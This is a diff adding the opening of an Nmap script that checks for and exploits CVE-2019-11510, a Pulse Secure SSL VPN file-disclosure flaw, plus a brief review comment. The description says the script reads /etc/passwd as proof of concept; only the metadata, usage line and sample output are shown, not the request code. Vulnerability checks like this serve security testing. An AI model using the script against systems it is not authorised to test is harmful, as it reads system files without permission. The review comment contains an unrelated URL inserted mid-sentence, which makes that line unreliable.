http-pulse_ssl_vpn.nse

```diff
@@ -0,0 +1,76 @@
+description = [[
+Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.
+This exploit reads /etc/passwd as a proof of concept
+This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
+]]
+
+local http = require "http"
+local shortport = require "shortport"
+local vulns = require "vulns"
+local stdnse = require "stdnse"
+local string = require "string"
+
+---
+-- @usage
+-- nmap -p <port> --script pulse_ssl_vpn <target>
+--
+-- @output
+-- PORT    STATE SERVICE
+-- s4430/tcp  open  http
+-- | http-vuln-cve2019-11510:
+-- |   VULNERABLE
+-- |   Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests
+-- |     State: VULNERABLE
+-- |     IDs:  CVE:CVE-2019-11510
+-- |
+-- |     Disclosure date: 2019-04-24
+-- |     References:
+-- |      http://www.securityfocus.com/bid/108073 
+-- |      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510
+-- |_     http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html 
+--
+-- @args http-vuln-cve2019-11510.method The HTTP method for the request. The default method is "GET".
```

Comment:
http-vuln-cve2019-11510.path The https://pmout.jfpal.com/ path to request. The default path is "/".